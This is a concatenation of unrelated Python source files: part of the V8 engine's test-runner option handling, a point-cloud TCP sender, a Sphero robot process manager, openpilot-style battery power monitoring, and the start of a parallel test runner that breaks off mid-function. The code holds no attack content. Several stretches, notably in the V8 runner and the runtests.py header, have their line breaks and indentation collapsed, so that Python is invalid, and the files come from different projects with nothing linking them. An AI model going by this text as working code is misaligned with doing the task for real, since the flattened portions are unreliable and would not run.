      default=False, action="store_true")
  result.add_option("-j", help="The number of parallel tasks to run",
      default=1, type="int")
  result.add_option("--time", help="Print timing information after running",
      default=False, action="store_true")
  result.add_option("--suppress-dialogs", help="Suppress Windows dialogs for crashing tests",
      dest="suppress_dialogs", default=True, action="store_true")
  result.add_option("--no-suppress-dialogs", help="Display Windows dialogs for crashing tests",
      dest="suppress_dialogs", action="store_false")
  result.add_option("--mips-arch-variant", help="mips architecture variant: mips32r1/mips32r2",
      default="mips32r2");
  result.add_option("--shell", help="Path to V8 shell", default="d8")
  result.add_option("--isolates", help="Whether to test isolates",
      default=False, action="store_true")
  result.add_option("--store-unexpected-output",
      help="Store the temporary JS files from tests that fails",
      dest="store_unexpected_output", default=True, action="store_true")
  result.add_option("--no-store-unexpected-output",
      help="Deletes the temporary JS files from tests that fails",
      dest="store_unexpected_output", action="store_false")
  result.add_option("--stress-only",
      help="Only run tests with --always-opt --stress-opt",
      default=False, action="store_true")
  result.add_option("--nostress",
      help="Don't run crankshaft --always-opt --stress-op test",
      default=False, action="store_true")
  result.add_option("--crankshaft",
      help="Run with the --crankshaft flag",
      default=False, action="store_true")
  result.add_option("--shard-count",
      help="Split testsuites into this number of shards",
      default=1, type="int")
  result.add_option("--shard-run",
      help="Run this shard from the split up tests.",
      default=1, type="int")
  result.add_option("--noprof", help="Disable profiling support",
      default=False)
  return result


def ProcessOptions(options):
  """Validate and normalize parsed options; returns False on bad input.

  Mutates module globals VERBOSE and VARIANT_FLAGS as side effects.
  """
  global VERBOSE
  VERBOSE = options.verbose
  options.mode = options.mode.split(',')
  for mode in options.mode:
    if not mode in ['debug',
'release']: print "Unknown mode %s" % mode return False if options.simulator != 'none': # Simulator argument was set. Make sure arch and simulator agree. if options.simulator != options.arch: if options.arch == 'none': options.arch = options.simulator else: print "Architecture %s does not match sim %s" %(options.arch, options.simulator) return False # Ensure that the simulator argument is handed down to scons. options.scons_flags.append("simulator=" + options.simulator) else: # If options.arch is not set by the command line and no simulator setting # was found, set the arch to the guess. if options.arch == 'none': options.arch = ARCH_GUESS options.scons_flags.append("arch=" + options.arch) # Simulators are slow, therefore allow a longer default timeout. if options.timeout == -1: if options.arch == 'arm' or options.arch == 'mips': options.timeout = 2 * TIMEOUT_DEFAULT; else: options.timeout = TIMEOUT_DEFAULT; if options.snapshot: options.scons_flags.append("snapshot=on") global VARIANT_FLAGS if options.mips_arch_variant: options.scons_flags.append("mips_arch_variant=" + options.mips_arch_variant) if options.stress_only: VARIANT_FLAGS = [['--stress-opt', '--always-opt']] if options.nostress: VARIANT_FLAGS = [[],['--nocrankshaft']] if options.crankshaft: if options.special_command: options.special_command += " --crankshaft" else: options.special_command = "@ --crankshaft" if options.shell.endswith("d8"): if options.special_command: options.special_command += " --test" else: options.special_command = "@ --test" if options.noprof: options.scons_flags.append("prof=off") options.scons_flags.append("profilingsupport=off") if options.build_system == 'gyp': if options.build_only: print "--build-only not supported for gyp, please build manually." 
      options.build_only = False
  return True


def DoSkip(case):
  """True iff the case's expected outcomes say to skip it entirely."""
  return (SKIP in case.outcomes) or (SLOW in case.outcomes)


REPORT_TEMPLATE = """\
Total: %(total)i tests
 * %(skipped)4d tests will be skipped
 * %(timeout)4d tests are expected to timeout sometimes
 * %(nocrash)4d tests are expected to be flaky but not crash
 * %(pass)4d tests are expected to pass
 * %(fail_ok)4d tests are expected to fail that we won't fix
 * %(fail)4d tests are expected to fail that we should fix\
"""


def PrintReport(cases):
  """Print the --report summary of expected outcomes for `cases`."""
  def IsFlaky(o):
    return (PASS in o) and (FAIL in o) and (not CRASH in o) and (not OKAY in o)
  def IsFailOk(o):
    return (len(o) == 2) and (FAIL in o) and (OKAY in o)
  unskipped = [c for c in cases if not DoSkip(c)]
  print REPORT_TEMPLATE % {
    'total': len(cases),
    'skipped': len(cases) - len(unskipped),
    'timeout': len([t for t in unskipped if TIMEOUT in t.outcomes]),
    'nocrash': len([t for t in unskipped if IsFlaky(t.outcomes)]),
    'pass': len([t for t in unskipped if list(t.outcomes) == [PASS]]),
    'fail_ok': len([t for t in unskipped if IsFailOk(t.outcomes)]),
    'fail': len([t for t in unskipped if list(t.outcomes) == [FAIL]])
  }


class Pattern(object):
  """A glob-ish pattern ('*' wildcard) compiled lazily to an anchored regex."""

  def __init__(self, pattern):
    self.pattern = pattern
    self.compiled = None

  def match(self, str):
    # NOTE(review): parameter `str` shadows the builtin within this method.
    if not self.compiled:
      pattern = "^" + self.pattern.replace('*', '.*') + "$"
      self.compiled = re.compile(pattern)
    return self.compiled.match(str)

  def __str__(self):
    return self.pattern


def SplitPath(s):
  """Split 'a/b/c' into a list of Patterns, dropping empty components."""
  stripped = [ c.strip() for c in s.split('/') ]
  return [ Pattern(s) for s in stripped if len(s) > 0 ]


def GetSpecialCommandProcessor(value):
  """Return a command-list transformer for --special-command.

  A '@' in `value` marks where the original command is spliced in; without
  one (or without a value) the identity transformer is returned.
  """
  if (not value) or (value.find('@') == -1):
    def ExpandCommand(args):
      return args
    return ExpandCommand
  else:
    pos = value.find('@')
    import urllib
    # Pieces are URL-unquoted so quoted spaces survive shell word splitting.
    prefix = urllib.unquote(value[:pos]).split()
    suffix = urllib.unquote(value[pos+1:]).split()
    def ExpandCommand(args):
      return prefix + args + suffix
    return ExpandCommand


# Suites run by default when no test paths are given on the command line.
BUILT_IN_TESTS = ['mjsunit', 'cctest', 'message', 'preparser']


def GetSuites(test_root):
  """List subdirectories of `test_root` that contain a testcfg.py."""
  def IsSuite(path):
    return isdir(path) and exists(join(path, 'testcfg.py'))
  return [ f for f in os.listdir(test_root) if IsSuite(join(test_root, f)) ]


def FormatTime(d):
  """Format a duration in seconds as MM:SS.mmm."""
  millis = round(d * 1000) % 1000
  return time.strftime("%M:%S.", time.gmtime(d)) + ("%03i" % millis)


def ShardTests(tests, options):
  """Return the 1-based shard-run'th of shard-count interleaved slices of
  `tests`; falls back to all tests on invalid shard settings."""
  if options.shard_count < 2:
    return tests
  if options.shard_run < 1 or options.shard_run > options.shard_count:
    print "shard-run not a valid number, should be in [1:shard-count]"
    print "defaulting back to running all tests"
    return tests
  count = 0
  shard = []
  for test in tests:
    if count % options.shard_count == options.shard_run - 1:
      shard.append(test)
    count += 1
  return shard


def Main():
  """Entry point: parse options, build targets, then select and run tests."""
  parser = BuildOptions()
  (options, args) = parser.parse_args()
  if not ProcessOptions(options):
    parser.print_help()
    return 1

  workspace = abspath(join(dirname(sys.argv[0]), '..'))
  suites = GetSuites(join(workspace, 'test'))
  repositories = [TestRepository(join(workspace, 'test', name)) for name in suites]
  repositories += [TestRepository(a) for a in options.suite]

  root = LiteralTestSuite(repositories)
  if len(args) == 0:
    paths = [SplitPath(t) for t in BUILT_IN_TESTS]
  else:
    paths = [ ]
    for arg in args:
      path = SplitPath(arg)
      paths.append(path)

  # Check for --valgrind option. If enabled, we overwrite the special
  # command flag with a command that uses the run-valgrind.py script.
if options.valgrind: run_valgrind = join(workspace, "tools", "run-valgrind.py") options.special_command = "python -u " + run_valgrind + " @" if options.build_system == 'gyp': SUFFIX['debug'] = '' shell = abspath(options.shell) buildspace = dirname(shell) context = Context(workspace, buildspace, VERBOSE, shell, options.timeout, GetSpecialCommandProcessor(options.special_command), options.suppress_dialogs, options.store_unexpected_output) # First build the required targets if not options.no_build: reqs = [ ] for path in paths: reqs += root.GetBuildRequirements(path, context) reqs = list(set(reqs)) if len(reqs) > 0: if options.j != 1: options.scons_flags += ['-j', str(options.j)] if not BuildRequirements(context, reqs, options.mode, options.scons_flags): return 1 # Just return if we are only building the targets for running the tests. if options.build_only: return 0 # Get status for tests sections = [ ] defs = { } root.GetTestStatus(context, sections, defs) config = Configuration(sections, defs) # Download missing test suite data if requested. 
if options.download_data: for path in paths: root.DownloadData(path, context) # List the tests all_cases = [ ] all_unused = [ ] unclassified_tests = [ ] globally_unused_rules = None for path in paths: for mode in options.mode: env = { 'mode': mode, 'system': utils.GuessOS(), 'arch': options.arch, 'simulator': options.simulator, 'crankshaft': options.crankshaft, 'isolates': options.isolates } test_list = root.ListTests([], path, context, mode, []) unclassified_tests += test_list (cases, unused_rules, all_outcomes) = config.ClassifyTests(test_list, env) if globally_unused_rules is None: globally_unused_rules = set(unused_rules) else: globally_unused_rules = globally_unused_rules.intersection(unused_rules) all_cases += ShardTests(cases, options) all_unused.append(unused_rules) if options.cat: visited = set() for test in unclassified_tests: key = tuple(test.path) if key in visited: continue visited.add(key) print "--- begin source: %s ---" % test.GetLabel() source = test.GetSource().strip() print source print "--- end source: %s ---" % test.GetLabel() return 0 if options.warn_unused: for rule in globally_unused_rules: print "Rule for '%s' was not used." % '/'.join([str(s) for s in rule.path]) if not options.isolates: all_cases = [c for c in all_cases if not c.TestsIsolates()] if options.report: PrintReport(all_cases) result = None cases_to_run = [ c for c in all_cases if not DoSkip(c) ] if len(cases_to_run) == 0: print "No tests to run." return 0 else: try: start = time.time() if RunTestCases(cases_to_run, options.progress, options.j): result = 0 else: result = 1 duration = time.time() - start except KeyboardInterrupt: print "Interrupted" return 1 if options.time: # Write the times to stderr to make it easy to separate from the # test output. 
print sys.stderr.write("--- Total time: %s ---\n" % FormatTime(duration)) timed_tests = [ t.case for t in cases_to_run if not t.case.duration is None ] timed_tests.sort(lambda a, b: a.CompareTime(b)) index = 1 for entry in timed_tests[:20]: t = FormatTime(entry.duration) sys.stderr.write("%4i (%s) %s\n" % (index, t, entry.GetLabel())) index += 1 return result if __name__ == '__main__': sys.exit(Main())
cwipc_toproxy.py
import sys
import os
import time
import threading
import traceback
import queue
import socket
import struct

from .. import CWIPC_POINT_PACKETHEADER_MAGIC
from ._scriptsupport import *


class Sender:
    """Forwards point clouds from a producer thread to a cwipc_proxy server over TCP."""

    def __init__(self, host, port, verbose=False):
        self.producer = None
        # Small queue so the producer drops frames rather than running
        # unboundedly ahead of the network.
        self.queue = queue.Queue(maxsize=2)
        self.verbose = verbose
        self.socket = socket.socket()
        self.socket.connect((host, port))

    def set_producer(self, producer):
        """Register the producer thread; run() exits when it is no longer alive."""
        self.producer = producer

    def run(self):
        """Main loop: pop queued point clouds and transmit them until the producer stops."""
        while self.producer and self.producer.is_alive():
            try:
                pc = self.queue.get(timeout=0.033)
                try:
                    self.send_pc(pc)
                finally:
                    # Always release the native point cloud, even if the send fails.
                    pc.free()
            except queue.Empty:
                pass

    def feed(self, pc):
        """Hand a point cloud to the sender; drops (and frees) it if the queue stays full."""
        try:
            self.queue.put(pc, timeout=0.5)
        except queue.Full:
            pc.free()

    def send_pc(self, pc):
        """Serialize one point cloud as a packet header plus raw point data and send it."""
        data = pc.get_bytes()
        cellsize = pc.cellsize()
        timestamp = pc.timestamp()
        header = struct.pack("<iiqfi", CWIPC_POINT_PACKETHEADER_MAGIC, len(data),
                             timestamp, cellsize, 0)
        # Use sendall(): socket.send() may transmit only part of the buffer,
        # which would desynchronize the length-prefixed stream framing.
        self.socket.sendall(header)
        self.socket.sendall(data)


def main():
    SetupStackDumper()
    parser = ArgumentParser(description="Send pointcloud stream to cwipc_proxy")
    parser.add_argument("host", action="store", help="Hostname where cwipc_proxy server is running")
    parser.add_argument("port", type=int, action="store", help="Port where cwipc_proxy server is running")
    args = parser.parse_args()
    sourceFactory, _ = cwipc_genericsource_factory(args)
    source = sourceFactory()
    sender = Sender(args.host, args.port)
    sourceServer = SourceServer(source, sender, args)
    sourceThread = threading.Thread(target=sourceServer.run, args=())
    if sender:
        sender.set_producer(sourceThread)
    #
    # Run everything
    #
    try:
        sourceThread.start()
        if sender:
            sender.run()
        sourceServer.stop()
        sourceThread.join()
    except KeyboardInterrupt:
        print("Interrupted.")
        sourceServer.stop()
    except Exception:
        # Catch Exception rather than a bare except so SystemExit and other
        # interpreter-level exits still propagate.
        traceback.print_exc()
    #
    # It is safe to call join (or stop) multiple times, so we ensure to cleanup
    #
    sourceServer.stop()
    sourceThread.join()
    sourceServer.statistics()


if __name__ == '__main__':
    main()
sphero_manager.py
from SpheroLib.sphero_bluetooth import run_sphero
import multiprocessing as mp
import time
# from slackclient import SlackClient
import subprocess


class SpheroManager:
    # Supervises one worker process per Sphero and restarts workers that
    # die or pull their kill switch.

    def __init__(self, shared_resources):
        """
        Spin up the sphero processes. Monitor them for good health.
        If they die, restart them.
        TODO: Alert State Machine
        """
        shared_resources.get_numpy_resources()
        self.shared_resources = shared_resources
        # Per-sphero bookkeeping: worker pid/handle, the shared kill-switch
        # flag, and the current reboot state ("ongoing" or "stopped").
        self.process_data = {sphero_num: {"pid": None,
                                          "proc": None,
                                          "kill_switch": None,
                                          "reboot_status": None}
                             for sphero_num in range(shared_resources.sphero_config["SIMULTANEOUS_SPHEROS"])}
        [self.start_sphero_process(sphero_num)
         for sphero_num in range(shared_resources.sphero_config["SIMULTANEOUS_SPHEROS"])]
        # Blocks forever: monitoring loop never returns.
        self.monitor_sphero_processes()

    def start_sphero_process(self, sphero_num):
        # Launch (or relaunch) the daemon worker process for one sphero.
        self.shared_resources.resources["logging_queue"].put_nowait(
            f"[Sphero Manager] Starting sphero {sphero_num} process.")
        # Shared int flag written by the worker; monitor_sphero_processes
        # reads it: 1 = kill switch pulled, 2 = low battery.
        kill_switch = mp.Value('i')
        kill_switch.value = 0
        sphero_proc = mp.Process(target=run_sphero,
                                 args=(self.shared_resources, sphero_num, kill_switch))
        # print (sphero_proc.daemon)
        sphero_proc.daemon = True
        sphero_proc.start()
        self.process_data[sphero_num]["pid"] = sphero_proc.pid
        self.process_data[sphero_num]["proc"] = sphero_proc
        self.process_data[sphero_num]["kill_switch"] = kill_switch
        self.process_data[sphero_num]["reboot_status"] = "ongoing"

    def monitor_sphero_processes(self):
        """
        If a sphero process goes down, restart it.
        """
        while True:
            time.sleep(.001)
            for sphero_num in self.process_data.keys():
                if self.process_data[sphero_num]["kill_switch"].value == 2:  # Low Battery
                    # Already handled: don't terminate/alert again.
                    if self.process_data[sphero_num]["reboot_status"] == "stopped":
                        continue
                    self.shared_resources.resources["logging_queue"].put_nowait(
                        f"[Sphero Manager] sphero{sphero_num} is low on charge. Alerting slack.")
                    self.process_data[sphero_num]["proc"].terminate()
                    # slackclient = SlackClient(self.shared_resources.sphero_config["SLACKTOKEN"])
                    # slackclient.api_call("chat.postMessage", channel="sphero_slack",
                    #                      text=f"Sphero {sphero_num} low battery. "
                    #                           f"Volts= {self.shared_resources.resources['np_array_sphero_battery']}")
                    self.process_data[sphero_num]["reboot_status"] = "stopped"
                elif self.process_data[sphero_num]["kill_switch"].value == 1:  # Kill Switch
                    self.shared_resources.resources["logging_queue"].put_nowait(
                        f"[Sphero Manager] sphero{sphero_num} process has pulled kill switch")
                    self.process_data[sphero_num]["proc"].terminate()
                    # Wait for the terminated worker to actually exit before
                    # reaping and relaunching it.
                    while self.process_data[sphero_num]["proc"].exitcode is None:
                        time.sleep(.01)
                    self.process_data[sphero_num]["proc"].join()
                    self.start_sphero_process(sphero_num)
                elif not self.process_data[sphero_num]["proc"].is_alive():
                    # Worker died on its own (crash/unexpected exit).
                    self.shared_resources.resources["logging_queue"].put_nowait(
                        f"[Sphero Manager] sphero{sphero_num} process has died")
                    self.process_data[sphero_num]["proc"].join()
                    print(self.process_data[sphero_num])
                    # NOTE(review): this 30 s back-off blocks monitoring of
                    # all other spheros -- confirm that is intentional.
                    time.sleep(30)
                    self.start_sphero_process(sphero_num)
power_monitoring.py
import random
import threading
import time
from statistics import mean

from cereal import log
from common.realtime import sec_since_boot
from common.params import Params, put_nonblocking
from common.hardware import TICI
from selfdrive.swaglog import cloudlog

CAR_VOLTAGE_LOW_PASS_K = 0.091  # LPF gain for 5s tau (dt/tau / (dt/tau + 1))
# A C2 uses about 1W while idling, and 30h seems like a good shutoff for most cars
# While driving, a battery charges completely in about 30-60 minutes
CAR_BATTERY_CAPACITY_uWh = 30e6
CAR_CHARGING_RATE_W = 45

VBATT_PAUSE_CHARGING = 11.0  # volts; compared against car_voltage_mV * 1e-3
MAX_TIME_OFFROAD_S = 30*3600


# Parameters: thin sysfs readers; all return `default` on any read failure.
def get_battery_capacity():
    """Device battery charge percentage (0-100)."""
    return _read_param("/sys/class/power_supply/battery/capacity", int)


def get_battery_status():
    # This does not correspond with actual charging or not.
    # If a USB cable is plugged in, it responds with 'Charging', even when charging is disabled
    return _read_param("/sys/class/power_supply/battery/status", lambda x: x.strip(), '')


def get_battery_current():
    """Device battery current draw in uA."""
    return _read_param("/sys/class/power_supply/battery/current_now", int)


def get_battery_voltage():
    """Device battery voltage in uV."""
    return _read_param("/sys/class/power_supply/battery/voltage_now", int)


def get_usb_present():
    """Whether a USB cable is physically plugged in."""
    return _read_param("/sys/class/power_supply/usb/present", lambda x: bool(int(x)), False)


def get_battery_charging():
    # This does correspond with actually charging
    return _read_param("/sys/class/power_supply/battery/charge_type", lambda x: x.strip() != "N/A", True)


def set_battery_charging(on):
    """Enable or disable charging of the device battery."""
    with open('/sys/class/power_supply/battery/charging_enabled', 'w') as f:
        f.write(f"{1 if on else 0}\n")


# Helpers
def _read_param(path, parser, default=0):
    """Read `path` and parse its contents with `parser`; return `default` on failure."""
    try:
        with open(path) as f:
            return parser(f.read())
    except Exception:
        return default


class PowerMonitoring:
    """Tracks device power usage while offroad and the car battery's estimated charge.

    calculate() is fed panda health packets: with ignition on it credits the
    car battery at CAR_CHARGING_RATE_W; with ignition off it integrates the
    device's own draw into power_used_uWh and debits the car battery estimate.
    """

    def __init__(self):
        self.params = Params()
        self.last_measurement_time = None  # Used for integration delta
        self.last_save_time = 0  # Used for saving current value in a param
        self.power_used_uWh = 0  # Integrated power usage in uWh since going into offroad
        self.next_pulsed_measurement_time = None
        self.car_voltage_mV = 12e3  # Low-passed version of health voltage
        self.integration_lock = threading.Lock()
        self.ts_last_charging_ctrl = None

        car_battery_capacity_uWh = self.params.get("CarBatteryCapacity")
        if car_battery_capacity_uWh is None:
            car_battery_capacity_uWh = 0

        # Reset capacity if it's low (floor the persisted estimate at 10% of full)
        self.car_battery_capacity_uWh = max((CAR_BATTERY_CAPACITY_uWh / 10), int(car_battery_capacity_uWh))

    # Calculation tick
    def calculate(self, health, msg):
        """Update the power/charge estimates from the latest health packet."""
        try:
            now = sec_since_boot()

            # If health is None, we're probably not in a car, so we don't care
            if health is None or health.health.hwType == log.HealthData.HwType.unknown:
                with self.integration_lock:
                    self.last_measurement_time = None
                    self.next_pulsed_measurement_time = None
                    self.power_used_uWh = 0
                return

            # Low-pass battery voltage
            self.car_voltage_mV = ((health.health.voltage * CAR_VOLTAGE_LOW_PASS_K) +
                                   (self.car_voltage_mV * (1 - CAR_VOLTAGE_LOW_PASS_K)))

            # Cap the car battery power and save it in a param every 10-ish seconds
            self.car_battery_capacity_uWh = max(self.car_battery_capacity_uWh, 0)
            self.car_battery_capacity_uWh = min(self.car_battery_capacity_uWh, CAR_BATTERY_CAPACITY_uWh)
            if now - self.last_save_time >= 10:
                put_nonblocking("CarBatteryCapacity", str(int(self.car_battery_capacity_uWh)))
                self.last_save_time = now

            # First measurement, set integration time
            with self.integration_lock:
                if self.last_measurement_time is None:
                    self.last_measurement_time = now
                    return

            if (health.health.ignitionLine or health.health.ignitionCan):
                # If there is ignition, we integrate the charging rate of the car
                with self.integration_lock:
                    self.power_used_uWh = 0
                    integration_time_h = (now - self.last_measurement_time) / 3600
                    if integration_time_h < 0:
                        raise ValueError(f"Negative integration time: {integration_time_h}h")
                    self.car_battery_capacity_uWh += (CAR_CHARGING_RATE_W * 1e6 * integration_time_h)
                    self.last_measurement_time = now
            else:
                # No ignition, we integrate the offroad power used by the device
                is_uno = health.health.hwType == log.HealthData.HwType.uno
                # Get current power draw somehow
                current_power = 0
                if TICI:
                    with open("/sys/class/hwmon/hwmon1/power1_input") as f:
                        current_power = int(f.read()) / 1e6
                elif get_battery_status() == 'Discharging':
                    # If the battery is discharging, we can use this measurement
                    # On C2: this is low by about 10-15%, probably mostly due to UNO draw not being factored in
                    current_power = ((get_battery_voltage() / 1000000) * (get_battery_current() / 1000000))
                elif (self.next_pulsed_measurement_time is not None) and (self.next_pulsed_measurement_time <= now):
                    # TODO: Figure out why this is off by a factor of 3/4???
                    FUDGE_FACTOR = 1.33

                    # Turn off charging for about 10 sec in a thread that does not get
                    # killed on SIGINT, and perform measurement here to avoid blocking thermal
                    def perform_pulse_measurement(now):
                        try:
                            set_battery_charging(False)
                            time.sleep(5)

                            # Measure for a few sec to get a good average
                            voltages = []
                            currents = []
                            for _ in range(6):
                                voltages.append(get_battery_voltage())
                                currents.append(get_battery_current())
                                time.sleep(1)
                            current_power = ((mean(voltages) / 1000000) * (mean(currents) / 1000000))

                            self._perform_integration(now, current_power * FUDGE_FACTOR)

                            # Enable charging again
                            set_battery_charging(True)
                        except Exception:
                            cloudlog.exception("Pulsed power measurement failed")

                    # Start pulsed measurement and return
                    threading.Thread(target=perform_pulse_measurement, args=(now,)).start()
                    self.next_pulsed_measurement_time = None
                    return

                elif self.next_pulsed_measurement_time is None and not is_uno:
                    # On a charging EON with black panda, or drawing more than 400mA out of a white/grey one
                    # Only way to get the power draw is to turn off charging for a few sec and check what the discharging rate is
                    # We shouldn't do this very often, so make sure it has been some long-ish random time interval
                    self.next_pulsed_measurement_time = now + random.randint(120, 180)
                    return
                else:
                    # Do nothing
                    return

                # Do the integration
                self._perform_integration(now, current_power)
        except Exception:
            cloudlog.exception("Power monitoring calculation failed")

    def _perform_integration(self, t, current_power):
        """Integrate `current_power` (W) over the interval since the last measurement."""
        with self.integration_lock:
            try:
                if self.last_measurement_time:
                    integration_time_h = (t - self.last_measurement_time) / 3600
                    power_used = (current_power * 1000000) * integration_time_h
                    if power_used < 0:
                        # Fixed: the old message labeled power_used (uWh) as "Current Power".
                        raise ValueError(f"Negative power used! Integration time: {integration_time_h} h Power used: {power_used} uWh")
                    self.power_used_uWh += power_used
                    self.car_battery_capacity_uWh -= power_used
                    self.last_measurement_time = t
            except Exception:
                cloudlog.exception("Integration failed")

    # Get the power usage
    def get_power_used(self):
        """Integrated offroad device power usage in uWh."""
        return int(self.power_used_uWh)

    def get_car_battery_capacity(self):
        """Current car battery charge estimate in uWh."""
        return int(self.car_battery_capacity_uWh)

    # See if we need to disable charging
    def should_disable_charging(self, health, offroad_timestamp):
        if health is None or offroad_timestamp is None:
            return False

        now = sec_since_boot()
        disable_charging = False
        disable_charging |= (now - offroad_timestamp) > MAX_TIME_OFFROAD_S
        disable_charging |= (self.car_voltage_mV < (VBATT_PAUSE_CHARGING * 1e3))
        disable_charging |= (self.car_battery_capacity_uWh <= 0)
        # Never disable while ignition is on, or when power-down is disabled by param.
        disable_charging &= (not health.health.ignitionLine and not health.health.ignitionCan)
        disable_charging &= (self.params.get("DisablePowerDown") != b"1")
        return disable_charging

    # See if we need to shutdown
    def should_shutdown(self, health, offroad_timestamp, started_seen, LEON):
        if health is None or offroad_timestamp is None:
            return False
        if get_battery_charging():
            return False

        now = sec_since_boot()
        panda_charging = (health.health.usbPowerMode != log.HealthData.UsbPowerMode.client)
        BATT_PERC_OFF = 90  # 10 if LEON else 3

        delta_ts = now - offroad_timestamp
        should_shutdown = False
        # Wait until we have shut down charging before powering down
        should_shutdown |= (not panda_charging and self.should_disable_charging(health, offroad_timestamp))
        should_shutdown |= ((get_battery_capacity() < BATT_PERC_OFF) and (delta_ts > 10))
        # Only ever shut down after a drive has been observed.
        should_shutdown &= started_seen
        return should_shutdown

    def charging_ctrl(self, msg, ts, to_discharge, to_charge):
        """Keep the device battery between `to_charge` and `to_discharge` percent.

        Rate-limited to at most one adjustment every 300 seconds; the first
        call only records the timestamp.
        """
        if self.ts_last_charging_ctrl is None or (ts - self.ts_last_charging_ctrl) >= 300.:
            # Renamed the misspelled local `battery_changing` -> battery_charging.
            battery_charging = get_battery_charging()
            if self.ts_last_charging_ctrl:
                if msg.thermal.batteryPercent >= to_discharge and battery_charging:
                    set_battery_charging(False)
                elif msg.thermal.batteryPercent <= to_charge and not battery_charging:
                    set_battery_charging(True)
            self.ts_last_charging_ctrl = ts
runtests.py
#!/usr/bin/python2.7 -B # This file is picked from project testa [https://github.com/TimeExceed/testa.git] # Copyright (c) 2013, Taoda (tyf00@aliyun.com) # All rights reserved. # # Redistribution and use in source and binary forms, with or without modification, # are permitted provided that the following conditions are met: # # * Redistributions of source code must retain the above copyright notice, this # list of conditions and the following disclaimer. # # * Redistributions in binary form must reproduce the above copyright notice, this # list of conditions and the following disclaimer in the documentation and/or # other materials provided with the distribution. # # * Neither the name of the {organization} nor the names of its # contributors may be used to endorse or promote products derived from # this software without specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND # ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED # WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE # DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR # ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES # (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; # LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON # ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT # (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS # SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 
import sys
import os
import os.path as op
from Queue import Queue
import threading
import json
import subprocess as subprocess
import shlex
import re
from functools import partial
from itertools import groupby
from datetime import datetime
import argparse
import termcolor


def countCpu():
    # Number of online CPUs; used as the default worker count.
    try:
        num = os.sysconf('SC_NPROCESSORS_ONLN')
        return num
    except (ValueError, OSError, AttributeError):
        raise NotImplementedError('cannot determine number of cpus')


def parseArgs():
    # Command-line interface of the runner.
    parser = argparse.ArgumentParser(description='Run some test cases, which obey testa protocol')
    parser.add_argument('executables', metavar='program', type=str, nargs='+',
        help='executables obey testa protocol')
    parser.add_argument('-l', '--lang', nargs='?', default='lang.config',
        help='a file specifying how to run executable for different programming languages. [default: lang.config]')
    parser.add_argument('-d', '--dir', nargs='?', default='test_results',
        help='the directory where results of test cases are put [default: test_results]')
    parser.add_argument('-j', '--jobs', nargs='?', type=int, default=countCpu(),
        help='how many test cases can run parallelly [default: as many as CPU cores]')
    parser.add_argument('-i', '--include', nargs='?', default='.*',
        help='A regular expression. Only test cases matching this pattern will be run. [default: ".*"]')
    parser.add_argument('-e', '--exclude', nargs='?', default='^$',
        help='A regular expression. Test cases matching this pattern will not be run. [default: "^$"]')
    parser.add_argument('--timeout', nargs='?',
        help='how long a case is allowed to run (in msec) [default: disable]')
    parser.add_argument('--report', nargs='?',
        help='report as a json file')
    args = parser.parse_args()
    return args


def readLangCfg(fn):
    # Load and validate the language config: a JSON list of dicts, each with
    # "language", "pattern" (filename regex) and "execute" (format string).
    with open(fn) as f:
        cfg = json.load(f)
    if type(cfg) != list:
        raise Exception('language config must be a list')
    for lang in cfg:
        if type(lang) != dict:
            raise Exception('each language in language config must be a dict')
        if 'language' not in lang:
            raise Exception('need "language" item for name of language')
        if 'pattern' not in lang:
            raise Exception('"pattern" is necessary for "%s", which must be a regular expression to match filenames' % lang["language"])
        if 'execute' not in lang:
            raise Exception('"execute" is necessary for "%s", which must a list of args' % lang["language"])
        if '%(arg)s' not in lang['execute']:
            # NOTE(review): this message mixes "%(arg)s" and "%s" in the same
            # format string, which raises when formatted -- the literal
            # should presumably be escaped as "%%(arg)s"; confirm.
            raise Exception('"%(arg)s" is necessary for "execute" in "%s", which stands for the arg of testa protocol' % lang["language"])
    return cfg


# Result tags exchanged between workers and the collector.
kOk = 'OK'
kError = 'Error'
kTimeout = 'Timeout'
kCancel = 'Cancel'

gCancelled = False


def work(opts, qin, qout):
    # Worker-thread main loop: run queued cases until a None sentinel (or
    # cancellation), reporting each result on qout.
    global gCancelled
    try:
        while True:
            cs = qin.get()
            if cs == None:
                break
            if gCancelled:
                break
            args = shlex.split(cs['execute'])
            kws = {}
            with open(cs['stdout'], 'wb') as stdout, open(cs['stderr'], 'wb') as stderr:
                kws['stdout'] = stdout
                kws['stderr'] = stderr
                kws['cwd'] = cs['cwd']
                cs['start'] = datetime.utcnow()
                try:
                    subprocess.check_call(args, **kws)
                    cs['stop'] = datetime.utcnow()
                    qout.put([kOk, cs['name'], cs])
                except subprocess.CalledProcessError:
                    # Record the failing invocation in the case's stderr file.
                    stderr.write(str(args))
                    stderr.write('\n')
                    stderr.write(str(kws))
                    stderr.write('\n')
                    cs['stop'] = datetime.utcnow()
                    qout.put([kError, cs['name'], cs])
    except KeyboardInterrupt:
        qout.put([kCancel, 'Ctrl-C'])
    except Exception as ex:
        qout.put([kCancel, str(ex)])


def launchWorkers(opts):
    # Start opts.jobs worker threads sharing a request and a result queue.
    reqQ = Queue()
    resQ = Queue()
    workers = [threading.Thread(target=work, args=(opts, reqQ, resQ))
               for _ in range(opts.jobs)]
    for w in workers:
        w.start()
    return reqQ, resQ, workers


def stopWorkers(reqQ, workers):
    # One None sentinel per worker, then join them all.
    for _ in range(len(workers)):
        reqQ.put(None)
    for w in workers:
        w.join()


def error(msg):
    # Print a fatal message and abort the runner.
    print msg
    sys.exit(1)


def findMatchLanguage(exe, langs):
    # First language whose filename pattern matches; falls back to running
    # the executable directly.
    for lang in langs:
        if re.match(lang['pattern'], exe):
            return lang
    return {'language': None, 'execute': '%(prog)s %(arg)s'}


def getExecutableArgs(exe, langs):
